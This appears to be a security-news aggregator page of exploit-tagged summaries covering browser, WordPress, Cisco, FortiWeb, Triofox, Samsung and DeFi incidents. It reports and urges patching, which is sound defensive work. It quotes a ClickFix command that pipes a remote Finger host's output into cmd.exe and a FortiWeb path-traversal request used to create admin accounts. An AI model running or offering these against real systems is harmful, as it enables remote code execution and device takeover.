All news with #exploit detected tag

Comet AI Browser's Embedded API Permits Device Access

⚠️ Security firm SquareX disclosed a previously undocumented MCP API inside the AI browser Comet that enables embedded extensions to execute arbitrary commands and launch applications — capabilities mainstream browsers normally block. The API can be triggered covertly from pages such as perplexity.ai, creating an execution channel exploitable via compromised extensions, XSS, MITM, or phishing. SquareX highlights that the analytics and agentic extensions are hidden and cannot be uninstalled, leaving devices exposed by default.

W3 Total Cache Plugin Critical PHP Command Injection

⚠️ A critical unauthenticated command injection (CVE-2025-9501) in the W3 Total Cache WordPress plugin allows attackers to execute arbitrary PHP via a crafted comment that abuses the _parse_dynamic_mfunc() routine. The developer released 2.8.13 on October 20 to address the flaw, but WordPress.org data indicate hundreds of thousands of sites may still be vulnerable. WPScan has produced a proof-of-concept exploit and plans public release on November 24, increasing the immediate risk for unpatched installations.

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

RondoDox Exploits XWiki Flaw to Rapidly Expand Botnet

⚠️ RondoDox has been observed exploiting unpatched XWiki instances to weaponize a critical eval injection, CVE-2025-24893, enabling arbitrary remote code execution via the /bin/get/Main/SolrSearch endpoint. The flaw was patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1 in late February 2025, but scanning and exploitation surged in November, including botnet-driven DDoS and cryptocurrency miner deployments. Security vendors noted spikes in activity on November 7 and November 11 and observed RondoDox adding this vector on November 3, 2025. Administrators should apply vendor patches immediately and review logs and network traffic for indicators of compromise.

FortiWeb Path Traversal Flaw Allows Admin Account Creation

⚠️ A path traversal vulnerability in Fortinet FortiWeb appliances is being actively exploited to create local administrative users without authentication. Researchers from Defused and PwnDefend described requests targeting the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi endpoint that inject admin accounts. Rapid7 and others confirm versions 8.0.1 and earlier are affected, while 8.0.2 is believed to contain the fix. Administrators are urged to update immediately, review logs for fwbcgi access, and search for unexpected admin accounts.

CISA Orders Feds to Patch Actively Exploited Cisco Flaws

🔒 CISA has ordered U.S. federal agencies to fully patch two actively exploited vulnerabilities in Cisco firewall appliances within 24 hours. Tracked as CVE-2025-20362 and CVE-2025-20333, the flaws permit unauthenticated access to restricted URL endpoints and remote code execution; chained together they can yield full device takeover. The agency emphasized applying the latest updates to all ASA and Firepower devices immediately, not just Internet-facing units.

Amazon: Threat Actor Exploited Cisco and Citrix Zero-Days

⚠️ Amazon's threat intelligence team disclosed that it observed an advanced threat actor exploiting two zero-day vulnerabilities in Citrix NetScaler ADC (CVE-2025-5777) and Cisco Identity Services Engine (CVE-2025-20337) to deploy a custom web shell. The backdoor, disguised as an IdentityAuditAction component, operates entirely in memory, uses Java reflection to inject into running threads, and registers a Tomcat listener to monitor HTTP traffic. Amazon observed the activity via its MadPot honeypot, called the actor highly resourced, and noted both flaws were later patched by the vendors.

Attackers Exploit Critical Triofox Flaw for Code Execution

⚠️ Mandiant and Google GTIG observed UNC6485 exploiting a critical improper access control flaw, CVE-2025-12480, in Gladinet Triofox versions prior to 16.7.10368.56560. Attackers spoofed a localhost Host header to reach setup pages, create a native 'Cluster Admin' account and upload payloads. They abused the product's anti‑virus configuration to execute arbitrary scripts as SYSTEM, then deployed remote access tools, escalated privileges and exfiltrated credentials. Users are urged to update, audit admin accounts and hunt for indicators of compromise.

Triofox CVE-2025-12480: Unauthenticated Access Leads to RCE

⚠️ Mandiant Threat Defense observed active exploitation of an unauthenticated access control vulnerability in Gladinet's Triofox (CVE-2025-12480) that allowed attackers to bypass authentication and reach administrative setup pages. By manipulating the HTTP Host header to impersonate localhost, attackers accessed protected admin workflows, created a native admin account, and configured the built-in anti‑virus engine to execute a malicious script as SYSTEM. The chain led to a PowerShell downloader, installation of a legitimate Zoho UEMS agent, and deployment of remote access tools; the vulnerability affected Triofox 16.4.10317.56372 and was mitigated in 16.7.10368.56560. Operators should upgrade immediately, audit admin accounts, and restrict anti‑virus engine paths.

LandFall Spyware Abused Samsung DNG Zero-Day via WhatsApp

🔒 A threat actor exploited a Samsung Android image-processing zero-day, CVE-2025-21042, to deliver a previously unknown spyware called LandFall using malicious DNG images sent over WhatsApp. Researchers link activity back to at least July 23, 2024, and say the campaign targeted select Galaxy models in the Middle East. Unit 42 found a loader and a SELinux policy manipulator in the DNG files that enabled privilege escalation, persistence, and data exfiltration. Users are advised to apply patches promptly, disable automatic media downloads, and enable platform protection features.

Cisco Firewall Zero-Days Now Triggering DoS Reboots

⚠️ Cisco warned that two recently patched firewall vulnerabilities (CVE-2025-20362 and CVE-2025-20333) — previously leveraged in zero-day intrusions — are now being abused to force ASA and FTD devices into unexpected reboot loops, causing denial-of-service. The vendor issued updates on September 25 and strongly urged customers to apply fixes immediately. CISA issued an emergency 24-hour directive for U.S. federal agencies and ordered EoS ASA devices to be disconnected. Shadowserver still reports tens of thousands of internet-exposed, unpatched devices.

Cisco Warns of Firewall Attack Causing DoS; Urges Patch

⚠️ Cisco disclosed a new attack variant that targets devices running Cisco Secure Firewall ASA and FTD software that are vulnerable to CVE-2025-20333 and CVE-2025-20362. The exploit can cause unpatched devices to unexpectedly reload, creating denial-of-service conditions, and follows prior zero-day campaigns that delivered malware such as RayInitiator and LINE VIPER, per the U.K. NCSC. Cisco additionally released patches for critical Unified CCX flaws and a high-severity DoS bug in ISE, and urges customers to apply updates immediately.

Critical RCE in React Native CLI Exposes Dev Servers

⚠️ A critical remote-code execution vulnerability in @react-native-community/cli and its cli-server-api component lets attackers run arbitrary OS commands via the Metro development server. The flaw stems from a /open-url endpoint that forwards a supplied URL directly to the open() package and, despite console messages, the server can bind to 0.0.0.0 rather than localhost. JFrog demonstrated Windows exploitation and the issue is fixed in cli-server-api version 20.0.0; users should update or bind the server to 127.0.0.1.

Balancer DeFi Protocol Loses Over $120M in Cyber Heist

🔐 Balancer, an Ethereum automated market maker, has been hit by a sophisticated exploit of its V2 Composable Stable Pools, with estimated losses exceeding $120 million. The team says pools that could be paused have been placed into recovery mode while it works with leading security researchers to investigate. Early analysis suggests a 'rounding down' precision loss in the Balancer Vault calculations was exploited and amplified via the batchSwap function. Balancer confirmed V3 pools were not affected and warned users about related phishing scams.

Balancer V2 Exploit Drains Over $120 Million in Crypto

🚨 Balancer announced an exploit of its V2 Compostable Stable Pools on Ethereum at 07:48 UTC that resulted in reported losses exceeding $128 million. Initial analysis from GoPlus Security points to a precision rounding error in the Vault’s swap calculations that an attacker chained via batchSwap, while other researchers suggest improper authorization and callback handling in V2 vaults. Balancer says the issue is isolated to V2 Compostable Stable Pools, with V3 and other pools unaffected, and the team is working with security researchers on a full post‑mortem. Users are warned to remain vigilant for scams and phishing attempts following the incident.

Brash Exploit Crashes Chromium Browsers via Title API

⚠️ Security researcher Jose Pino disclosed "Brash", a severe flaw in the Blink rendering engine that can crash many Chromium-based browsers within 15–60 seconds via a single malicious URL. The root cause is missing rate limiting on the document.title API, enabling attackers to inject millions of DOM mutations per second and saturate the browser UI thread. Pino describes a three-phase technique — hash generation, burst injection, and UI-thread saturation — and warns the code can be time-triggered to act like a logic bomb. Affected products include Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, and some AI browser interfaces; Firefox and Safari are not vulnerable.

Chromium Blink flaw crashes Chrome, Edge; exploit published

⚠ A researcher, Jose Pino, published a proof-of-concept on October 29 demonstrating a Blink rendering-engine flaw that can crash Chrome, Microsoft Edge and several other Chromium-based browsers within seconds by flooding document.title updates. Pino says he reported the issue to Google on August 28 and, after no response, released the PoC to force public attention. The exploit saturates the main thread with millions of DOM mutations per second, producing rapid CPU spikes, tab freezes and eventual process termination, and it raises particular concern for headless and automated enterprise workflows.

ThreatsDay: DNS Poisoning, Supply-Chain Heist, New RATs

🔔 This week's ThreatsDay bulletin highlights a critical BIND9 vulnerability (CVE-2025-40778) enabling DNS cache poisoning and a public PoC, along with widespread campaign activity from loaders, commodity RATs and supply-chain trojans. Other notable items include a guilty plea by a former defense employee for selling cyber-exploit components to a Russian broker, a new Linux Rust dual-personality evasion technique, and Avast's free decryptor for Midnight ransomware. Recommended defensive actions emphasize patching to the latest BIND9 releases, enabling DNSSEC, restricting recursion, and strengthening monitoring and authentication controls.

Smashing Security Podcast 441: Poker, F1 Data Risks

🎧 In episode 441 Graham Cluley and guest Danny Palmer discuss an alleged poker scam that reportedly involved basketball players working with organised crime to cheat high‑stakes games using hacked shufflers, covert cameras and an X‑ray card table. Researchers also uncovered that an FIA driver portal could be probed to expose personal details of Formula 1 stars. The hosts close with Graham’s “Pick of the Week,” a surreal CAPTCHA browser game, and a lighter cultural segment.

Critical WordPress Plugin Flaws Exploited at Scale Globally

🔴 Wordfence warns that threat actors are actively exploiting three critical 2024 CVEs in popular WordPress plugins, GutenKit and Hunk Companion, which report more than 40,000 and 8,000 active installations respectively. The vulnerabilities permit unauthenticated attackers to install and activate arbitrary plugins or upload spoofed plugin files, enabling remote code execution (RCE) and straightforward site takeover when exploited or chained with other flaws. Discovered via Wordfence's bug bounty in late September and early October, the campaign reignited on 8 October and the vendor has already blocked nearly 8.8 million exploitation attempts while urging administrators to update or remove affected versions.